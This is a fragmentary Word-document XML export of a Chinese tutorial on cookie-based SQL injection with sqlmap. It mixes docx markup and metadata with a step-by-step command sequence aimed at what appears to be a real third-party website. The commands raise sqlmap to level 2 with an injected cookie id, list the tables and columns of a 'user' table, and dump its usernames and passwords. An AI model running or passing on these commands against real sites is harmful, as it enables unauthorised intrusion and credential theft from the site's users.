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SQLMAP介绍之Cookie注入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目前没有找到适合的网站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"http://www.wisefund.com.cn/about.asp?id"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28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://www.wisefund.com.cn/about.asp?id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=56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 sqlmap -u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"http://www.wisefund.com.cn/about/asp?id"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http://www.wisefund.com.cn/about/asp?i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d=56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,显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示 might not be injectable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输入sqlmap -u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http://www.wisefund.com.cn/about/asp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--cookie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id=56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--level 2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--cookie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这里面写ID的参数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如果是cookie注入，就要把等级提升为level 2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输入sqlmap -u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http://www.wisefund.com.cn/about/asp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--cookie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id=56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--level 2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输入sqlmap -u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http://www.wisefund.com.cn/about/asp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--tables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 xml:space="preserve">--cookie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id=56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--level 2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-------------------------------------------后面和ASP注入一样的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输入sqlmap -u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http://www.wisefund.com.cn/about/asp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--columns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 xml:space="preserve">-T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user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--cookie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id=56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--level 2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输入sqlmap -u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http://www.wisefund.com.cn/about/asp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--dump -C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username,password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--cookie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id=56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--level 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:firstLine="442" w:firstLineChars="100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rPr>
          <w:rFonts w:hint="default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D45E3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CC5D45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E217A"/>
    <w:rsid w:val="0A710887"/>
    <w:rsid w:val="0B6B6F03"/>
    <w:rsid w:val="22557495"/>
    <w:rsid w:val="336F378D"/>
    <w:rsid w:val="40243A4A"/>
    <w:rsid w:val="40266332"/>
    <w:rsid w:val="42874596"/>
    <w:rsid w:val="43FC0A26"/>
    <w:rsid w:val="45974A62"/>
    <w:rsid w:val="47F7174F"/>
    <w:rsid w:val="4D492133"/>
    <w:rsid w:val="564103BD"/>
    <w:rsid w:val="57DA5FE2"/>
    <w:rsid w:val="59886AC1"/>
    <w:rsid w:val="609A06A7"/>
    <w:rsid w:val="60C267AF"/>
    <w:rsid w:val="66780DC9"/>
    <w:rsid w:val="7BC629FD"/>
    <w:rsid w:val="7C4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2019-07-24T11:14:00Z</dcterms:created>
  <dc:creator>柠檬不萌</dc:creator>
  <cp:lastModifiedBy>柠檬不萌</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-26T06:06:15Z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